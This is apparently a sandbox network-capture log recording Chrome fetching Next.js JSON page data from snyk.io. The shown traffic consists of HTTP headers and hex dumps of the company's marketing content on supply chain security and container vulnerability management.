                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 78 58 44 72 4a 51 4e 66 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 22 2c 22 72 6f 77 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 77 5a 64 63 52 6e 69 66 58 73 38 41 42 36 64 7a 44 4c 50 6b 42 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000xXDrJQNf","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumn","rows":{"__typename":"NavigationDropdownMenuColumnRowsCollection","items":[{"sys":{"id":"1wZdcRnifXs8AB6dzDLPkB","__typename":"Sys"},"__typename":"NavigationDropdownMenuCo
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12INData Raw: 62 65 6c 22 3a 22 67 69 74 68 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: bel":"gith
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC5548INData Raw: 30 30 30 30 31 35 41 30 0d 0a 75 62 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 6e 79 6b 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 77 69 43 32 61 61 54 37 4f 71 71 76 75 35 77 68 64 71 70 62 4b 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 6e 70 6d 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 70 6d 6a 73 2e 63 6f 6d 2f 70 61 63 6b 61 67 65 2f 73 6e 79 6b 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 6f 6c 6a 66 54 4d 47 44 70 48 4a 4c 73 70 65 4d 4f 55 39 48 74 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79
                                                                                                                                                                                                                                                                                                              Data Ascii: 000015A0ub","url":"https://github.com/snyk/"},{"sys":{"id":"1wiC2aaT7Oqqvu5whdqpbK","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"npm","url":"https://www.npmjs.com/package/snyk"},{"sys":{"id":"3oljfTMGDpHJLspeMOU9Ht","__typename":"Sy
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              72192.168.2.54983023.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC687OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/software-supply-chain-security.json?slug=solutions&slug=software-supply-chain-security HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC654INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"pbwj1v0cm930yr"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/software-supply-chain-security.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::nmvkd-1729799348764-04469f845333
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:08 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799348.1f60e3f
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC15730INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 35 73 6a 68 6e 4d 57 68 38 66 59 39 65 42 52 39 63 67 6c 77 30 6d 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 34 54 31 38 3a 32 35 3a 34 33 2e 36 36 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 39 2d 32 33 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5sjhnMWh8fY9eBR9cglw0m","type":"Entry","createdAt":"2022-11-04T18:25:43.667Z","updatedAt":"2023-09-23T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC15931INData Raw: 2d 6d 65 64 69 61 22 2c 22 68 65 61 64 6c 69 6e 65 22 3a 22 4b 6e 6f 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 70 6f 73 74 75 72 65 20 6f 66 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 70 61 63 6b 61 67 65 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 73 6e 79 6b 2e 69 6f 2f 61 64 76 69 73 6f 72 2f 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b
                                                                                                                                                                                                                                                                                                              Data Ascii: -media","headline":"Know the security posture of open source packages","description":{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[],"value":"","nodeType":"text"},{"data":{"uri":"https://snyk.io/advisor/"},"content":[{"data":{},"marks":[
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 36 36 33 30 38 36 33 34 31 2f 77 6f 72 64 70 72 65 73 73 2d 73 79 6e 63 2f 33 39 70 65 72 63 65 6e 74 2e 73 76 67 22 2c 22 72 65 73 6f 75 72 63 65 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 22 2c 22 72 61 77 5f 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 22 3a 22 22 7d 5d 7d 7d 2c 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 32 76 54 65 4f 61 70 57 38 46 58 70 67 4d 45 62 6d 78 59 30 34
                                                                                                                                                                                                                                                                                                              Data Ascii: snyk/image/upload/v1663086341/wordpress-sync/39percent.svg","resource_type":"image","raw_transformation":""}]}},{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2vTeOapW8FXpgMEbmxY04
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC1119INData Raw: 6d 65 6e 74 22 7d 2c 22 73 65 63 74 69 6f 6e 49 64 22 3a 22 77 68 61 74 2d 69 73 22 7d 7d 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 65 6d 62 65 64 64 65 64 2d 65 6e 74 72 79 2d 62 6c 6f 63 6b 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 54 6f 64 61 79 2c 20 6d 6f 73 74 20 6f 66 20 74 68 65 20 73 6f 66 74 77 61 72 65 20 77 65 20 75 73 65 20 72 65 6c 69 65 73 20 6f 6e 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 2f 73 65 72 69 65 73 2f 6f 70 65 6e 2d 73 6f 75 72 63 65 2d 73 65 63 75 72 69 74 79 2f 22 7d 2c 22 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                                                                              Data Ascii: ment"},"sectionId":"what-is"}}},"content":[],"nodeType":"embedded-entry-block"},{"data":{},"content":[{"data":{},"marks":[],"value":"Today, most of the software we use relies on ","nodeType":"text"},{"data":{"uri":"/series/open-source-security/"},"content
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 76 65 20 61 70 70 72 6f 61 63 68 20 74 6f 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 20 69 6e 74 65 67 72 69 74 79 20 61 6e 64 20 63 6f 6e 66 69 64 65 6e 74 69 61 6c 69 74 79 20 6f 66 20 73 6f 66 74 77 61 72 65 20 74 68 72 6f 75 67 68 6f 75 74 20 69 74 73 20 65 6e 74 69 72 65 20 6c 69 66 65 63 79 63 6c 65 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 61 6e 63 68 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000ve approach to protecting the integrity and confidentiality of software throughout its entire lifecycle.","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"marks":[],"value":"","nodeType":"text"},{"data":{"uri":"ancho
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12INData Raw: 2c 20 61 6c 73 6f 20 6b 6e 6f 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: , also kno
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 77 6e 20 61 73 20 74 79 70 6f 73 71 75 61 74 74 69 6e 67 20 6f 72 20 62 72 61 6e 64 6a 61 63 6b 69 6e 67 2e 20 44 65 76 65 6c 6f 70 65 72 73 20 63 61 6e 20 61 63 63 69 64 65 6e 74 61 6c 6c 79 20 75 70 64 61 74 65 20 6f 72 20 69 6e 73 74 61 6c 6c 20 6d 61 6c 69 63 69 6f 75 73 20 76 65 72 73 69 6f 6e 73 20 6f 66 20 70 61 63 6b 61 67 65 73 2c 20 63 6f 6d 70 72 6f 6d 69 73 69 6e 67 20 74 68 65 69 72 20 73 79 73 74 65 6d 73 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 64 6f 63 75 6d 65 6e 74 22 7d 2c 22 72 65 6e 64 65 72 51 75 65 73 74 69 6f 6e 41 73 22 3a 22 68 32 22 2c 22 61 6e 63 68 6f 72 49 64
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000wn as typosquatting or brandjacking. Developers can accidentally update or install malicious versions of packages, compromising their systems.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"renderQuestionAs":"h2","anchorId
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12INData Raw: 74 68 65 73 65 20 70 61 63 6b 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: these pack
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 45 38 32 42 0d 0a 61 67 65 73 2e 20 48 6f 77 65 76 65 72 2c 20 74 68 69 73 20 69 73 20 6e 6f 74 20 61 20 73 75 62 73 74 69 74 75 74 65 20 66 6f 72 20 6d 61 6c 77 61 72 65 20 64 65 74 65 63 74 69 6f 6e 2e c2 a0 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 61 6e 63 68 6f 72 3a 6e 65 78 74 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000E82Bages. However, this is not a substitute for malware detection.","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"marks":[],"value":"","nodeType":"text"},{"data":{"uri":"anchor:next"},"content":[{"data":{},"marks":[
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 79 20 62 65 74 77 65 65 6e 20 74 68 65 20 46 65 64 65 72 61 6c 20 47 6f 76 65 72 6e 6d 65 6e 74 20 61 6e 64 20 74 68 65 20 70 72 69 76 61 74 65 20 73 65 63 74 6f 72 2c 20 61 6e 64 20 74 69 67 68 74 65 72 20 73 65 63 75 72 69 74 79 20 6f 66 20 74 68 65 20 73 6f 66 74 77 61 72 65 20 70 75 72 63 68 61 73 65 64 20 62 79 20 74 68 65 20 46 65 64 65 72 61 6c 20 47 6f 76 65 72 6e 6d 65 6e 74 2e 20 54 68 65 20 72 69 73 6b 20 70 6f 73 65 64 20 62 79 20 73 6f 66 74 77 61 72 65 20 73 75 70 70 6c 79 20 63 68 61 69 6e 20 61 74 74 61 63 6b 73 20 69 73 20 63 6c 65 61 72 6c 79 20 61 72 74 69 63 75 6c 61 74 65 64 20 61 74 20 74 68 65 20 62 65 67 69 6e 6e 69 6e 67 20 6f 66 20 73 65 63 74 69 6f 6e 20 34 20 6f 66 20 74 68 65 20 6f 72 64 65 72 3a 22 2c 22 6e 6f 64 65 54 79 70
                                                                                                                                                                                                                                                                                                              Data Ascii: y between the Federal Government and the private sector, and tighter security of the software purchased by the Federal Government. The risk posed by software supply chain attacks is clearly articulated at the beginning of section 4 of the order:","nodeTyp


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              73192.168.2.54982923.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC491OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/container-vulnerability-management.json?slug=product&slug=container-vulnerability-management HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC656INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"e92mxz31z51vhl"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/container-vulnerability-management.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::65grw-1729799348785-aec2d41b26ad
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:08 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799348.109461a
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC15728INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 36 4f 65 6f 6e 50 49 78 46 30 65 4a 4a 45 71 58 65 62 37 65 34 6c 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 30 2d 32 30 54 31 35 3a 33 39 3a 31 30 2e 30 39 39 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 35 2d 30 31 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6OeonPIxF0eJJEqXeb7e4l","type":"Entry","createdAt":"2022-10-20T15:39:10.099Z","updatedAt":"2024-05-01T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC8860INData Raw: 65 22 3a 22 52 65 6d 65 64 69 61 74 69 6f 6e 20 67 75 69 64 61 6e 63 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 53 6e 79 6b 20 43 6f 6e 74 61 69 6e 65 72 20 6c 65 74 73 20 64 65 76 65 6c 6f 70 65 72 73 20 6b 6e 6f 77 20 74 68 65 20 72 69 73 6b 73 20 69 6e 20 65 61 63 68 20 69 6d 61 67 65 2c 20 61 6e 64 20 70 72 6f 76 69 64 65 73 20 6f 6e 65 2d 63 6c 69 63 6b 20 75 70 67 72 61 64 65 73 20 61 6e 64 20 61 6c 74 65 72 6e 61 74 69 76 65 20 69 6d 61 67 65 20 72 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 73 2e 22 2c 22 6e 6f 64 65 54 79
                                                                                                                                                                                                                                                                                                              Data Ascii: e":"Remediation guidance","description":{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[],"value":"Snyk Container lets developers know the risks in each image, and provides one-click upgrades and alternative image recommendations.","nodeTy
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 73 63 61 6e 2d 63 69 2d 63 64 2e 73 76 67 22 2c 22 74 61 67 73 22 3a 6e 75 6c 6c 2c 22 74 79 70 65 22 3a 22 75 70 6c 6f 61 64 22 2c 22 62 79 74 65 73 22 3a 34 32 34 39 39 35 2c 22 77 69 64 74 68 22 3a 36 31 39 2c 22 66 6f 72 6d 61 74 22 3a 22 73 76 67 22 2c 22 68 65 69 67 68 74 22 3a 33 39 36 2c 22 63 6f 6e 74 65 78 74 22 3a 7b 22 63 75 73 74 6f 6d 22 3a 7b 22 67 75 69 64 22 3a 22 35 66 35 63 61 36 39 62 36 39 64 39 34 64 65 62 36 31 30 37 30 34 30 30 34 39 65 66 34 63 66 38 22 2c 22 63 61 70 74 69 6f 6e 22 3a 22 69 6c 6c 75 73 74 72 61 74 65 64 2d 75 69 2d 73 6e 79 6b 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 6f 63 6b 65 72 2d 73 63 61 6e 2d 63 69 2d 63 64 22 2c 22 63 6c 64 5f 77 70 5f 70 6c 75 67 69 6e 22 3a 22 31 22 7d 7d 2c 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000scan-ci-cd.svg","tags":null,"type":"upload","bytes":424995,"width":619,"format":"svg","height":396,"context":{"custom":{"guid":"5f5ca69b69d94deb6107040049ef4cf8","caption":"illustrated-ui-snyk-container-docker-scan-ci-cd","cld_wp_plugin":"1"}},"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC8204INData Raw: 79 22 2c 22 66 69 72 73 74 4e 61 6d 65 22 3a 22 43 68 61 72 6c 6f 74 74 65 22 2c 22 6c 61 73 74 4e 61 6d 65 22 3a 22 54 6f 77 6e 73 6c 65 79 22 2c 22 74 69 74 6c 65 22 3a 22 44 69 72 65 63 74 6f 72 2c 20 53 65 63 75 72 69 74 79 20 45 6e 67 69 6e 65 65 72 69 6e 67 22 2c 22 63 6f 6d 70 61 6e 79 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 45 57 46 49 37 46 38 52 34 42 4e 50 63 44 51 68 70 72 65 56 74 6c 22 2c 22 74 79 70 65 22 3a 22
                                                                                                                                                                                                                                                                                                              Data Ascii: y","firstName":"Charlotte","lastName":"Townsley","title":"Director, Security Engineering","company":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3EWFI7F8R4BNPcDQhpreVtl","type":"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 22 6f 72 67 61 6e 69 73 6d 50 72 6f 64 75 63 74 50 72 69 63 69 6e 67 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 53 6e 79 6b 20 43 6f 6e 74 61 69 6e 65 72 20 70 72 6f 64 75 63 74 20 70 72 69 63 69 6e 67 20 63 61 72 64 73 22 2c 22 73 65 63 74 69 6f 6e 49 6e 74 72 6f 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000"organismProductPricing"}},"locale":"en-US"},"fields":{"internalName":"Snyk Container product pricing cards","sectionIntro":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":
